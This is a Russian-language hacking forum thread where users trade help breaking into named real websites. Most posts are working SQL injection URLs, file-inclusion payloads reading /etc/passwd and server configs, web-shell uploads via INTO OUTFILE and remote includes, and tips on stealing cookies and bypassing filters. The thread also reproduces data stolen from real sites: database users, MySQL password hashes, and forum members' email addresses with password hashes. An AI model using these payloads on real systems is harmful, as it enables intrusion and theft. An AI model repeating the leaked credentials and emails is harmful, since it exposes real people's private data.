мда
http://warsong.ws/exchange/engine/repair.php?realm=1&guid=10%20and%20%28select%201%20from%28select%20co unt%28*%29,concat%28table_name,floor%28rand%280%29 *2%29%29x%20from%20information_schema.tables%20gro up%20by%20x%29a%29--

http://warsong.ws/exchange/engine/repair.php?realm=1&guid=10+or+(select+count(*)+from+information_schem a.tables+group+by+concat(table_name,floor(rand(0)* 2)))--

Data truncated for column 'guid' at row 1Duplicate entry 'achievement_reward1' for key 'group_key'

все понел?

Тоже самое выложил )))

да, спасибо большое !

как пути на сервере раскрыть ? есть доступ к phpmyadmin
phpmyadmin/phpinfo.php ничего не выводит...
кстати сервер под виндой

кстате /phpmyadmin/scripts/setup.php доступен ли и какая версия phpmyadmin-а

phpmyadmin 3.2.0.1, сервер Microsoft-IIS/6.0
/phpmyadmin/scripts/setup.php не доступен, этот файл удалён

Не могу вытащить логины да пароли из слепой скули

http://www.ollis.ru/index.php?rest=1')+AND+1=2+UNION+SELECT+0,1,2,3,4, 5%23

на 6 поле этом вылетает пустая страница.
Знаю что вывод из скули такой:

http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)e) b)a--+

Версия:

http://www.ollis.ru/index.php?id=cabinet')+and+(1,2)=(Select*From(Sele ct+Name_Const(version(),1),Name_Const(version(),1) %20)a)%23&type=cabinet&action=lost_pw&mode=return_from_hidden

Помогите вытащить пароли...нужно срочно....есть хочу=)))

Всем привет
есть массив /bla.php?s=sss
там дописывается инклудинг funtions.php тоесть ссылка получается такая /bla.php?s=sssfuntions.php вставляю %00 => /bla.php?s=sss%00 в ответ Warning: require_once(sss\0funtions.php) [function.require-once]: failed to open stream: No such file or directory ....
есть ли возможность обойти фильтрацию ?

Если RFI, то можешь залить на хостинг файлик functions.php, и проинклудить его.

Стукни мне в асю 674542, или в ПМ кинь сайт, посмотрю.

Всем привет
есть массив /bla.php?s=sss
там дописывается инклудинг funtions.php тоесть ссылка получается такая /bla.php?s=sssfuntions.php вставляю %00 => /bla.php?s=sss%00 в ответ
есть ли возможность обойти фильтрацию ?
/bla.php?s=http://disk.re4ka.net/upload/58739714/wso2.jpg.php?
Если же фильтрация на http, заюзай data http://www.xakep.ru/magazine/xa/127/060/1.asp

/bla.php?s=http://disk.re4ka.net/upload/58739714/wso2.jpg.php?
Если же фильтрация на http, заюзай data http://www.xakep.ru/magazine/xa/127/060/1.asp
:(
Warning: require_once() [function.require-once]: URL file-access is disabled in the server configuration

никто не знает как в DLE шелл залить ?!

Есть Учетка главного модера на phpBB 3.0.7, есть ли уязвимости для получения доступа к админке или заливки шела?

Есть Учетка главного модера на phpBB 3.0.7, есть ли уязвимости для получения доступа к админке или заливки шела?

залить файл даже с правами админа не можешь

залить файл даже с правами админа не можешь

https://forum.antichat.ru/showpost.php?p=1176333&postcount=36 :)

не знал,спс ;)

а есть ли возможность во втором версии?

https://forum.antichat.ru/showpost.php?p=198446&postcount=3

:.']https://forum.antichat.ru/showpost.php?p=1176333&postcount=36 :)

не знал,спс ;)

а есть ли возможность во втором версии?

C одного ресурса вытащил хеши от всего от админки от ПМА и от форума и расшифровал (есть и инклуд, вытащил все конфиги тоже) но никуда не пускает, видимо сервер с вебом находится в локалки доступ к ктоторой идет через прокс.
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http-proxy Squid webproxy 2.6.STABLE21
443/tcp closed https
что можно сделать ? как можно обойти ?

http://mindviz.com/gift.php?id=-717+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17--
тут File_Priv на Y..
http://mindviz.com/gift.php?id=-717+UNION+SELECT+1,2,3,4,5,6,7,8,LOAD_FILE('/etc/passwd'),10,11,12,13,14,15,16,17+from+mysql.user--
путь вроде /home/sites/mindviz/mail/
делаю так
http://mindviz.com/gift.php?id=-717+UNION+SELECT+1,2,3,4,5,6,7,8,<?include($_GET[сmd]);?>,10,11,12,13,14,15,16,17+from+mysql.user+into+outf ile+'/home/sites/mindviz/mail/shell.php'--
что не так..??
http://mindviz.com/shell.php?cmd=phpinfo(); че не идет?

papst
Путь неправильный. Вдобавок 9ое поле не выводится. Бери 7ое например.

И надеюсь ты понимаешь, что твой "шелл" делает?

PS into outfile и затем load_file() даже в /tmp/ не проходит.

а какой тогда правельный?.. ато я уже многие пути испробовал

Есть логин и пароль и именя баз данных но немогу найти phpMyAdmin!!! Подскажите хорошую прогу для удаленного редактирования...

GOGA075 http://scan.xaknet.ru:8080/action/scan

и не факт что есть phpmyadmin

2papst ищи в конфигах пути /etc/httpd/conf/httpd.conf например

а какой тогда правельный?.. ато я уже многие пути испробовал

правильный или нет путь проверяется путем попытки прочитать какую-то страницу сайта:

http://mindviz.com/gift.php?id=-717+UNION+SELECT+1,2,3,4,5,6,load_file('/home/sites/mindviz/httpd/gift.php'),8,9,10,11,12,13,14,15,16,17--+

Путь взят отсюда:

http://mindviz.com/gift.php?id=-717+UNION+SELECT+1,2,3,4,5,6,load_file('/usr/local/apache/conf/httpd.conf'),8,9,10,11,12,13,14,15,16,17--+


DocumentRoot /home/sites/mindviz/httpd <------

Чтобы залить шелл, надо найти папку, доступную на запись, php-код лучше хексить, а не писать в чистом виде

есть шанс порутить ядро Fri Dec 4 08:40:11 EET 2009 ?!
этот сплоент (http://www.exploit-db.com/exploits/9860) был до обновы ядра выпущен :mad:

http://www.knife.ru/index.php?1=1&do=list&treeid=1+union+all+select+1 - вот вроде sql inj выводит ошибку Ошибка запроса: 'select name,parentid from kn_tree where id=1 union all select 1'
а если запрос изменить на:
http://www.knife.ru/index.php?1=1&do=list&treeid=1+union+all+select+1,2
то ошибка уже Ошибка запроса: 'select typeid from kn_tree where id=1 union all select 1,2'
что это значит? и как подобрать количество полей.?
кстати вот ещё http://www.knife.ru/index.php?1=1&do=list&treeid=1+order+by+1 терь ошибка вообще другая...

Подскажите хороший perl интерпретатор для сплоита.

click (http://www.activestate.com/activeperl/downloads/) active perl

Gorev, благодарю!

EP']http://www.knife.ru/index.php?1=1&do=list&treeid=1+union+all+select+1 - вот вроде sql inj выводит ошибку Ошибка запроса: 'select name,parentid from kn_tree where id=1 union all select 1'
а если запрос изменить на:
http://www.knife.ru/index.php?1=1&do=list&treeid=1+union+all+select+1,2
то ошибка уже Ошибка запроса: 'select typeid from kn_tree where id=1 union all select 1,2'
что это значит? и как подобрать количество полей.?
кстати вот ещё http://www.knife.ru/index.php?1=1&do=list&treeid=1+order+by+1 терь ошибка вообще другая...

Version: 5.5.2-m2-log
Database: information_schema / knife / knife_forum / knife_phpbb2
Installation dir: /usr/local/
User: knife@localhost
слепая
з.ы щяс порыскаю может ище чтото найду

Как определить какая СУБД?
вылазит такая ошибка
Вывода добиться не получилось
select top 1 * from dbo.OnlcPages where url_path_en in ('tenders/','tenders/c0/','tenders/c0/'--+a/') or url_path in ('tenders/','tenders/c0/','tenders/c0/'--+a/') order by url_path_en desc

Как определить какая СУБД?
вылазит такая ошибка
Вывода добиться не получилось
select top 1 * from dbo.OnlcPages where url_path_en in ('tenders/','tenders/c0/','tenders/c0/'--+a/') or url_path in ('tenders/','tenders/c0/','tenders/c0/'--+a/') order by url_path_en desc

MSSQL вроде

Так и есть, MSSQL.

Залил шел, а там только белая страница, в чом проблема может быть??

Вообщем возник такой вопрос... возможно ли абсолютно точно определить версию joomla 1.5 ?
<meta name="generator" content="Joomla! 1.5 - Open Source Content Management" />
Это то понятно... а именно какая можно пробить ?

Вообщем возник такой вопрос... возможно ли абсолютно точно определить версию joomla 1.5 ?
<meta name="generator" content="Joomla! 1.5 - Open Source Content Management" />
Это то понятно... а именно какая можно пробить ?

no way man !

нашёл хсс активную на одном интересном для меня сайте, но возникла проблема с кражей куков..
Приходят все строки в куках но bbpassword=hash не приходит..
в опере смотрю у себя куки, есть bbpassword=hash а смотрю в логах сниффера нет такова.. это какая то защита от кражи куков или я что то не так делаю ? как быть, что с хсс делать ? как в админку попасть)

мы не экстрасенсы скинь сайт

Сайт где именно не буду говорить ) просто может кто встречался с этим случием и знает что делать.. у меня такое не с одним сайтом вообще встречалось.. как так, в опере есть кук с хешем: bbpassword а сниффер не ловит его.. как быть..

что делать если такая ошибка
Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(modules/../../../../../../../etc/pass\0/copyright.php) is not within the allowed path(s): (/hosting/site.ru/htdocs/) in /hosting/site.ru/htdocs/includes/javascript.php on line 59

адрес такой: site.ru/modules.php?name=../../../../../../../etc/pass
site.ru/modules.php?name= ставлю ссылку на шелл - заплатка стоит

что делать если такая ошибка
Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(modules/../../../../../../../etc/pass\0/copyright.php) is not within the allowed path(s): (/hosting/site.ru/htdocs/) in /hosting/site.ru/htdocs/includes/javascript.php on line 59

адрес такой: site.ru/modules.php?name=../../../../../../../etc/pass
site.ru/modules.php?name= ставлю ссылку на шелл - заплатка стоит

https://forum.antichat.ru/thread98525.html

https://forum.antichat.ru/thread98525.html


не то или я не умею

нужен аналог софтины Netdevilz sql ScanneR, которая сканит, а потом и парсит уязвимые урлы. Работает через гугл, такие запросы, как inurl:forum.php?id= site:.ru
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=

и т.д.

не то или я не умею

site.ru/modules.php?name=../../../../../../../etc/pass

Во первых - нету такого файла pass, есть файл passwd

Проблема в magic_quotes.

Пример для Unix сервера:
site.ru/modules.php?name=../../../../../../../etc/passwd//////////////////[..4095..]

4095 - это минимальное количество слешей.

Но подобный способ довольно таки редко получается провести.

нужен аналог софтины Netdevilz sql ScanneR, которая сканит, а потом и парсит уязвимые урлы. Работает через гугл, такие запросы, как inurl:forum.php?id= site:.ru
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=

и т.д.

тоесть sql helper 2.7, Pangolin etc...?

[Feldmarschall],

нет конечно.

Эти программы для тупых и для ленивых! Мне не нужно, чтобы за меня делали мою работу. Мне нужен материал, с каким нужно работать.

Во первых - нету такого файла pass, есть файл passwd

Проблема в magic_quotes.

Пример для Unix сервера:
site.ru/modules.php?name=../../../../../../../etc/passwd//////////////////[..4095..]

4095 - это минимальное количество слешей.

Но подобный способ довольно таки редко получается провести.



что делать если такая ошибка
Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(modules/../../../../../../../etc/pass\0/copyright.php) is not within the allowed path(s): (/hosting/site.ru/htdocs/) in /hosting/site.ru/htdocs/includes/javascript.php on line 59

адрес такой: site.ru/modules.php?name=../../../../../../../etc/pass
site.ru/modules.php?name= ставлю ссылку на шелл - заплатка стоит




нет смысла инклюдить /etc/passwd - там же написано, что open_basedir врублен.

Всем привет,
есть в общем скрипт авторизации,
исходник примерно такой:
if( @$_SERVER['HTTP_A'] != 'admin') {header("Location: notauth.php");exit;}

Что мне надо сделать чтобы в суперглобальном массиве $_SERVER['HTTP_A'] было значение 'admin', или как мне пройти авторизацию?
буду очень благодарен за любые подсказки,

Всем привет,
есть в общем скрипт авторизации,
исходник примерно такой:
if( @$_SERVER['HTTP_A'] != 'admin') {header("Location: notauth.php");exit;}

Что мне надо сделать чтобы в суперглобальном массиве $_SERVER['HTTP_A'] было значение 'admin', или как мне пройти авторизацию?
буду очень благодарен за любые подсказки,


послать заголовок A=admin

нужен аналог софтины Netdevilz sql ScanneR, которая сканит, а потом и парсит уязвимые урлы. Работает через гугл, такие запросы, как inurl:forum.php?id= site:.ru
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=

и т.д.
http://slil.ru/28959824
пасс: antichat

Redwood
скинь сюда название, полное

Redwood
скинь сюда название, полное
SQLi/XSS/LFI/RFI Exploit Scanner

послать заголовок A=admin


решено,
спасибо огромное!!!

Просто "A"

с помощью Acunetix Web Vulnerability - Http editor, добавляю заголовок HTTP_A, но авторизация не проходит,
может я не то делаю?


надо не HTTP_A, а A.


вот на php пример

echo get('www.entropy.ch', '/software/MacOSX/php/test.php', 'http://google.com/', 'firefox', '');
function get($hostname, $path, $ref, $ua, $cook)
{
$line="";
$fp=fsockopen($hostname, 80, $errno, $errstr, 60);

if(!$fp) echo $errstr($errno);
else
{
$headers = "GET $path HTTP/1.1\r\n";
$headers .="Host: $hostname\r\n";
$headers .="User-Agent: $ua\r\n";
$headers .= "Accept-Language: en,en-US;q=0.9,en;q=0.8\r\n";
$headers .= "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\n";
$headers .="Cookie: $cook\r\n";
$headers .="A: admin\r\n";
$headers .="Connection: Close\r\n";
$headers .="Referer: $ref\r\n\r\n";

fwrite($fp, $headers);


while(!feof($fp)){

$line .= fgets($fp, 1024);
}

fclose($fp);
}

return $line;
}

http://www.kino.ru/forum.php?id=-2274+union+select+1,2,3--
помогите найти столбец паролей. Нашел мыла, логины, пароли найти не могу.
Версия: 4

нет смысла инклюдить /etc/passwd - там же написано, что open_basedir врублен.

Ну я показал пример самого способа ( хот и не очень удачный, так как не учел условия для выхода за пределы каталога ).

эмм...
вот такая проблема
MS SQL /Version:
Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
Aug 6 2000 00:57:48
Copyright (c) 1988-2000 Microsoft Corporation
Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)

когда делаю вот такой запрос:
1'+or+1=(select+top+1+CardNumber+from+CCards)--
и в ответ



Типы данных text, ntext и image недействительны в этом подопросе или в этом выражении агрегата.

hex,aes_encrypt(aes_.. не идут

Original
Microsoft OLE DB Provider for ODBC Drivers- Fehler '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Die Datentypen text, ntext und image sind in dieser Unterabfrage oder in diesem Aggregatausdruck ungültig.

/inc/session.inc, line 25

остольные columns все идут..

[Feldmarschall]
В MSSQL: and(1)=convert(int,@@version)--

У меня такой вопрос:

http://www.site.com/email.asp?id=2--&email=asd@asd.co'm

Ответ:
Microsoft OLE DB Provider for SQL Server error '80040e10'

Procedure or Function 'subscribe_email' expects parameter '@email', which was not supplied.
Кто может предположить как код выглядит? Там обращение к функции - но оно идет как asp код или sql?
В приведенном примере двойное тире комментирует поле имейла.

PS А еще интересно, что если я иду по:
http://www.site.com/email.asp?id=2, @email=1--&email=asd@asd.co'm
То поле email принимает указанное мною значение (единица)! И страничка успешно грузится.

Кто-нибудь понимает, что там происходит?

Ну я показал пример самого способа ( хот и не очень удачный, так как не учел условия для выхода за пределы каталога ).

не пашет такое
site.ru/modules.php?name=../../../../../../../etc/passwd//////////////////[..4095..]
.................что можно провести еще? :)

[Feldmarschall]
В MSSQL: and(1)=convert(int,@@version)--

O_o причем сдесь это ??
мне что version нужно узнать? ты повнимательней почитай мой пост, прежде чем отвечать то что я сам знаю..


и convert не идет там

']O_o причем сдесь это ??
мне что version нужно узнать? ты повнимательней почитай мой пост, прежде чем отвечать то что я сам знаю..


и convert не идет там
Я тебе показал, что для вызова ошибки с содержимым запроса можно использовать convert(), вместо @@version можешь подставить свой запрос.

Раз выдается ошибка на твой запрос, можно попробовать привести типы:

1'+or+1=convert(varchar,(select+top+1+CardNumber+f rom+CCards))--

не с convert все также

подскажите, как через sql inj сделать dump базы ?

подскажите, как через sql inj сделать dump базы ?
если есть права у тебя на запись в какую то директорию то можно сдампить структуру бд и данные из таблиц. но блин палево =\ лучше шел залить и там уже все одним файлом сдампить

мануалы читать можешь?

INTO OUTFILE

пример

SELECT * FROM Customers INTO OUTFILE '/home/site/kortinko/dump.txt'

помоqите поjaлуста


http://www.venen-kur.info/index.php?id=1319&lang=-1-1%20or%20(select%20count(*)from(select%201%20union %20select%202%20union%20select%203)x%20group%20by% 20concat(mid((select%20column_name%20from%20inform ation_schema.columns%20where%20table_name=0x757365 725F7573657273%20limit%201,1),1,64),floor(rand(0)* 2)))

а вот не получается

http://www.venen-kur.info/index.php?id=1319&lang=-1-1%20or%20(select%20count(*)from(select%201%20union %20select%202%20union%20select%203)x%20group%20by% 20concat(mid((select%20username1%20from%20user_use rs),1,64),floor(rand(0)*2)))


и так тоje

http://www.venen-kur.info/index.php?id=1319&lang=-1-1%20or%20(select%20count(*)from(select%201%20union %20select%202%20union%20select%203)x%20group%20by% 20concat(mid((select%20username%20from%20user_user s),1,64),floor(rand(0)*2)))

http://www.venen-kur.info/index.php?id=1319&lang=(select+1+from+(select+count(0),concat((selec t+version()),floor(rand(0)*2))+from+information_sc hema.tables+group+by+2+limit+1)a)--+


в чем трабл?

и так тоje

http://www.venen-kur.info/index.php?id=1319&lang=-1-1 or (select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select username1 from user_users),1,64),floor(rand(0)*2)))

System information:
-----------------------------------------
base:db242799363
basedir:/usr/local/mysql-5.0.81-linux-i686-glibc23/
os:pc-linux-gnu
ver:5.0.81-log
datadir:/db/mysql/
tmpdir:/var/tmp
-----------------------------------------
Tables in information_schema.tables - 29
-----------------------------------------
COLLATIONS
COLUMNS
COLUMN_PRIVILEGES
ROUTINES
SCHEMA_PRIVILEGES
TABLES
TABLE_PRIVILEGES
USER_PRIVILEGES
cms_languages
cms_pages
cms_settings
user_functions
user_groups
user_platforms
CHARACTER_SETS
COLLATION_CHARACTER_SET_APPLICABILITY
KEY_COLUMN_USAGE
PROFILING
SCHEMATA
STATISTICS
TABLE_CONSTRAINTS
TRIGGERS
VIEWS
cms_media
cms_related
cms_trees
user_group_functions
user_in_group
user_users
-----------------------------------------
Table [ user_users ]
-----------------------------------------
Database for user_users: example.com
Number of columns in example.com.user_users: 9
Columns in example.com.user_users
username
platform_id
is_superuser
first_login
session_key
id
email
password
session
----------


не вижу никаких проблем

зачем такие сложности в данно случае в запросе? ппц :(

зачем такие сложности в данно случае в запросе? ппц :(

ну вообще да))


http://www.venen-kur.info/index.php?id=1319&lang=1+union+select+1,2,version(),4--+


PS:


http://www.venen-kur.info/index.php?id=1319&lang=(select+1+from+(select+count(0),concat((selec t+password+from+user_users+limit+0,1),floor(rand(0 )*2))+from+user_users+group+by+2)a)--+

угу =)) в том то и дело. первая тож принтабельная

вот именно ети я тоjэ виташил а коqда зделаеш concat(username видает error

вот именно ети я тоjэ виташил а коqда зделаеш concat(username видает error
я те уже вытащил юзверей и пасы :(

davay link

http://www.venen-kur.info/index.php?id=1319&lang=1+and+1=0+%20Union%20Select%20%20concat_ws%28 username,0x3a,password%29,2,3,4%20from%20%20user_u sers--
через limit всех вытащишь :)

a qde login pass ?

jmvN/m90uBX8OHg ??

угу.
удачи ;)

net ti zdelal concat_ws%28 username,0x3a,password%29

a vidimo tolko :jmvN/m90uBX8OHg

a eto sto login ili parol ?? a zacem tolko eto ?

ааааа

http://www.venen-kur.info/index.php?id=1319&lang=1+and+1=0+%20Union%20Select%20%20concat_ws%28 0x3a,username,0x3a,password%29,2,3,4%20from%20%20u ser_users--

я те ща в пм скину че там))

ok ponyatno..pasiba..

Помогите плиз:
Вот php инъекция:
http://www.partnersinpreservation.com/boston/index.php?sec=../../../../../../../../../../../../../etc/passwd%00&locID=16

нашел там PHPSESSID он там j7h4hqb6d43c1f0e3bc84volf6
вбиваю http://www.partnersinpreservation.com/boston/index.php?sec=../../../../../../../../../../../../../tmp/sess_j7h4hqb6d43c1f0e3bc84volf6
ничего нет

в какой еще директории может быть файл сессии?

Лучше вот это поизучай:

http://www.partnersinpreservation.com/boston/index.php?sec=/proc/self/status%00

http://www.partnersinpreservation.com/boston/index.php?sec=/etc/httpd/conf/httpd.conf%00

http://www.partnersinpreservation.com/boston/index.php?sec=/proc/version%00


https://forum.antichat.net/showpost.php?p=1088072&postcount=11

стандартная скуль

http://www.nicemeeting.fr/modules.php?name=Annonces&op=ViewCatg&id_catg=220%27

но union и select режется модулем NukeSentinel

http://www.nicemeeting.fr/modules.php?name=Annonces&op=ViewCatg&id_catg=220+and+substring%28version%28%29,1,1%29=5

в подзапросах также режется select

как обойти?

стандартная скуль

http://www.nicemeeting.fr/modules.php?name=Annonces&op=ViewCatg&id_catg=220%27

но union и select режется модулем NukeSentinel

http://www.nicemeeting.fr/modules.php?name=Annonces&op=ViewCatg&id_catg=220+and+substring%28version%28%29,1,1%29=5

в подзапросах также режется select

как обойти?

Например так

http://www.nicemeeting.fr/modules.php?name=Annonces&op=ViewCatg&id_catg=-220+unIoN+SeLeCt+1,2+--+

Кто может дать хорший и мощный скрипт што бы дамп БД на 3 гига слить, а то ошибки выдает с такими размерами!!

GOGA075,
Sypex Dumper скачай

jecka3000, вот как раз он то и выдает ошибки!!!
Что 1.0.8b и 2.0.6
несправляються с такими обьемами!!

очень прошу помощи, не выводит результат из столбцов.
http://amkar.properm.ru/info.php?id=-12+UNION+SELECT+concat_ws(unhex(hex(email,0x20,pas sword)))+from+0x6670705f6d656d62657273--

П.С. Вся информация в исходном коде, в таком виде,например: <br> <img src="graffiti/warn_lastwarn"></p><p align = "center"><br>

мне же нужно вывести из таблы fpp_members столбцы name password email
не выводит, помогите)

ммм... :)
http://amkar.properm.ru/info.php?id=-999.9+or%281,1%29=%28select+count%280%29,concat%28 %28select+concat%28database%28%29%29+from+informat ion_schema.tables+limit+0,1%29,floor%28rand%280%29 *2%29%29from%28information_schema.tables%29group+b y+2%29

Version: 5.0.51a-24+lenny2-log
Current User: properm@localhost
Data Bases:
_muzik
amkar
amkar_fan
amore
avto
baba
bikini
comix
contests
euroset
forum
globass
klass
kvn
led
linkation
map
miss_whatever
miss_zima
moda
muzik
muzik_old
mysql
nebo
nevesta
newseater
permskoe
properm
reality
reality_backup
seolib
sf
spravka
spravka2
spravka_backup_2009_10_31
spravka_backup_2009_11_07
User:
'root'@'localhost'
'reality'@'localhost'
'realty'@'localhost'
'seo'@'localhost'
'sprvk'@'localhost'
'zabbix'@'localhost'
'spravka'@'localhost'
'properm'@'localhost'
'debian-sys-maint'@'localhost'
'root'@'proserv'
'alya'@'%'
'replication_user'@'%'
'remote_root'@'%'

MySQL DB

User Password
alya *8D43FE3D5955DD53B1156534EE7AD854CA88FF24
remote_root
replication_user *A1DAA5D16F63E661DFFE8FB7E5CCF0E235F0C601
debian-sys-maint *D6E3AC52927F6BD477ACFEB9E18DCCC3094FFF97
properm *C58CE76F735421EB5B5BC2BB332CEF2674661499
reality *66758BD9AE5EFE6F5EFD754A0386969808EE2991
realty *27D8E13E226CE3F3DB6116796584A6BCF2AA3305
root *966F8B69DCE8F1383221C7E89C8AB06697332DAC
seo *6063C78456BB048BAF36BE1104D12D547834DFEA
spravka *050376F3855A67F5E2C6514FD3130B31006C1276
sprvk *30763283C56FC465C0F1F869CD097A5ABDF1F4D9
zabbix *2D90A69B6136A8DE2E6B87DC14504CE500DA21CF
root *CAC83AB2E75198C3287CD7E81B808F9C6D54B41A


DATABASE: forum
(TABLES):
fpp_admin_logs
fpp_admin_sessions
fpp_badwords
fpp_cache_store
fpp_calendar_events
fpp_categories
fpp_contacts
fpp_css
fpp_email_logs
fpp_emoticons
fpp_faq
fpp_files
fpp_files_cats
fpp_files_comments
fpp_files_custentered
fpp_files_custfields
fpp_files_downloads
fpp_files_favorites
fpp_files_votes
fpp_forum_perms
fpp_forum_tracker
fpp_forums
fpp_groups
fpp_languages
fpp_macro
fpp_macro_name
fpp_member_extra
fpp_members
fpp_messages
fpp_moderator_logs
fpp_moderators
fpp_pfields_content
fpp_pfields_data
fpp_polls
fpp_posts
fpp_reg_antispam
fpp_search_results
fpp_sessions
fpp_skin_templates
fpp_skins
fpp_spider_logs
fpp_stats
fpp_subscription_currency
fpp_subscription_extra
fpp_subscription_logs
fpp_subscription_methods
fpp_subscription_trans
fpp_subscriptions
fpp_templates
fpp_titles
fpp_tmpl_names
fpp_topic_mmod
fpp_topics
fpp_tracker
fpp_validating
fpp_voters
fpp_warn_logs
ibf_admin_logs
ibf_admin_sessions
ibf_announcements
ibf_attachments
ibf_attachments_type
ibf_badwords
ibf_banfilters
ibf_bulk_mail
ibf_cache_store
ibf_calendar_events
ibf_conf_settings
ibf_conf_settings_titles
ibf_contacts
ibf_custom_bbcode
ibf_email_logs
ibf_emoticons
ibf_faq
ibf_forum_perms
ibf_forum_tracker
ibf_forums
ibf_groups
ibf_languages
ibf_mail_error_logs
ibf_mail_queue
ibf_member_extra
ibf_members
ibf_members_converge
ibf_message_text
ibf_message_topics
ibf_moderator_logs
ibf_moderators
ibf_pfields_content
ibf_pfields_data
ibf_polls
ibf_posts
ibf_reg_antispam
ibf_search_results
ibf_sessions
ibf_skin_macro
ibf_skin_sets
ibf_skin_templates
ibf_skin_templates_cache
ibf_spider_logs
ibf_subscription_currency
ibf_subscription_extra
ibf_subscription_logs
ibf_subscription_methods
ibf_subscription_trans
ibf_subscriptions
ibf_task_logs
ibf_task_manager
ibf_titles
ibf_topic_mmod
ibf_topics
ibf_topics_read
ibf_tracker
ibf_upgrade_history
ibf_validating
ibf_voters
ibf_warn_logs

Table: fpp_members

email password name
test@localhost.com chucha
pn@reaktive.ru 7277da89be64a89aa02a2d7423a0c05c Guest
red_ma@mail.ru 81dc9bdb52d04dc20036dbd8313ed055 Juissy
vsv1407@yandex.ru 1406e7afb3eb1f83b4bd4e310cee7fc6 magic
ca@properm.ru 287e9593819b2fcdf9945e7ccacd637d reaktive
pn@reaktive.ru 72fed2b8265919690c815f0316b346cc scbsncks
ve@properm.ru b0baee9d279d34fa1dfd71aadb908c3f wer
stasne@yandex.ru 48309aa13d9d9497b097495188b2863a Николай

посмотрел на phpinfo() там magic_quotes_gpc в local value ON а в master value OFF..
и теперь ON или OFF ??

посмотрел на phpinfo() там magic_quotes_gpc в local value ON а в master value OFF..
и теперь ON или OFF ??
http://forum.ixbt.com/topic.cgi?id=69:97

http://www.ticketing.ru/news.php?id=1022+order+by+100--

в данном месте интересует только раскрутка инклуда(!) расскажите что да как. Если тут это возможно

Причем тут тогда SQl inj?
И вообще там просто нет подключаемого файла в директории.
На запрос не как не повлияешь.

какие есть способы заливки шелла в DLE ? подскажите, кто сталкивался, очень нужно :(

какие есть способы заливки шелла в DLE ? подскажите, кто сталкивался, очень нужно
версия даты?

http://www.ticketing.ru/news.php?id=1022+order+by+100--

в данном месте интересует только раскрутка инклуда(!) расскажите что да как. Если тут это возможно


там нет инклюда, просто файла нет необходимого.

Подскажите, что надо прописать чтобы инфу вытягивать со второй строки, а не с первой.
Например в этой sql:
+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24,concat(username,0x3a,pa ssword,0x3a,gid,0x3a,id)Gabriel,26,+from+jos_users +limit+1,1--
спасибо.

+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24,group_concat(username,0 x3a,pa ssword,0x3a,gid,0x3a,id)Gabriel,26,+from+jos_users--

vsid55, лимитом и перебирай
+limit+1,1--
+limit+2,1--
+limit+3,1--
+limit+4,1--
и так далее

MSSQL
script.php?id=14'%20and%201=1--

Выдает Error : Conversion failed when converting the varchar value '14\' to data type int. (severity 16). Как бороться ?

MSSQL
script.php?id=14'%20and%201=1--

Выдает Error : Conversion failed when converting the varchar value '14\' to data type int. (severity 16). Как бороться ?

OMG
дай линк в ПМ..

стандартная скуль в mysql

http://www.xxx.com/index.php?id=2956775+union+select+1,2,3,4,5,6,7,8, 9,10/*

выдает нормальную страницу юзера

а вот попытки вывести принтабельные поля не проходят.

все фишки типа:
http://www.xxx.com/index.php?id=-2956775+union+select+1,2,3,4,5,6,7,8,9,10/*
http://www.xxx.com/index.php?id=29567111175+union+select+1,2,3,4,5,6, 7,8,9,10/*
http://www.xxx.com/index.php?id=2956775+and+1=2+union+select+1,2,3,4, 5,6,7,8,9,10/*

не дают результат, выводит только:
The profile is not active!

есть ли еще идеи как это обойти?

админки нет, а blind'oм тянуть 2 ляма юзеров это самоубийство

durito
А http://www.xxx.com/index.php?id=2956775+and+1=1+union+select+1,2,3,4, 5,6,7,8,9,10/* выдает профиль?

Может union и(или) select фильтруются? Поиграй регистром и скобками.

budden

http://www.xxx.com/index.php?id=2956775+and+1=1+union+select+1,2,3,4, 5,6,7,8,9,10/*

выдает профиль юзера
такой же как и тут

http://www.xxx.com/index.php?id=2956775


сайт серьезный, поэтому урл не публикую

unhex(hex())

and+1=0+ попробуй
-2956775 тоже

budden

http://www.xxx.com/index.php?id=2956775+and+1=1+union+select+1,2,3,4, 5,6,7,8,9,10/*

выдает профиль юзера
такой же как и тут

http://www.xxx.com/index.php?id=2956775


сайт серьезный, поэтому урл не публикую

Что значит выдает профиль юзера?
Если значение intval, то и так будет выдавать id=2956775+antichat+ru--+, и не факт что это инжа. И что значит "and 1=1"? Параметр id и так верный, какой смысл в данной манипуляции?

И последнее.. Только я не вижу вопроса?

v1d0qz
Я тоже так подумал, потому и спросил:
http://www.xxx.com/index.php?id=2956775+and+1=1... у него дает профиль, а
http://www.xxx.com/index.php?id=2956775+and+1=2... - не дает.

Мне кажется там WAF стоит.

какую профил ?

http://www.xxx.com/profil.php?id=2956775
ссилка у тебя такая ?

только я не понимаю что он хочет?
ссылку в студию посмотрим есть скуль или нету.

вот ссылка

http://www.soulmades.com.au/index.php?ap=2956775+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,5 9,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75, 76,77,78,79,80/*

Странно, что непонятно: не работает union в скуле - соотв-но хэш (и другие поля, кроме дефолтово отображаемых) не утянуть из базы.

Не могу залить shell

